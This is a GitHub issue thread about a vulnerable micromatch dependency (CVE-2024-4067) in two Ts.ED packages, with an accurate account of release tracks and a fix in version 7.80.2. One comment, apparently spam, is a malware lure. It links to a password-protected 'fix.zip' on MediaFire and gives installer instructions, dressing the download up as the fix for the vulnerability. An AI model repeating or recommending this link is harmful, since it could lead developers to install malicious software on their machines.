### ISSUE TITLE
[Bug] micromatch dependency vulnerable to CVE-2024-4067

### ISSUE THREAD

**Issue by timbodeit** [TypedProject/ts-express-decorators#2794]
### Describe the bug

`@tsed/platform-cache` and `@tsed/swagger` currently depend on `"micromatch": "4.0.5"` which is vulnerable to https://github.com/advisories/GHSA-952p-6rrq-rcjv

### To Reproduce

In a project that includes the dependencies 
```
    "@tsed/platform-cache": "7.80.1",
    "@tsed/swagger": "7.80.1",
```
run `npm audit`.

### Expected behavior

npm audit should return without finding vulnerabilities (Updating `micromatch` to v4.0.8)

### OS

macOS

### Node version

v18.17.1

### Library version

v7.80.1

### Additional context

**Warning** https://github.com/micromatch/micromatch/blob/4.0.8/CHANGELOG.md mentions

```
# [4.0.6] - 2024-05-21
[...]
BREAKS API COMPATIBILITY
Should be labeled as a major release, but it's not.
```

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by timbodeit** [comment]
Looking deeper into this:
* 4.0.6 which broke API compatibility was coming from a different release track.
* 4.0.8 is a separate release track that includes the vulnerability fixes, but does not include the breaking changes from 4.0.6

So ts-ed should be fine just updating from 4.0.5 to 4.0.8 without additional adaptions.

Related discussions:
* https://github.com/micromatch/micromatch/issues/257
* https://github.com/micromatch/micromatch/issues/264

**Comment by timbodeit** [comment]
Fixed in `7.80.2`
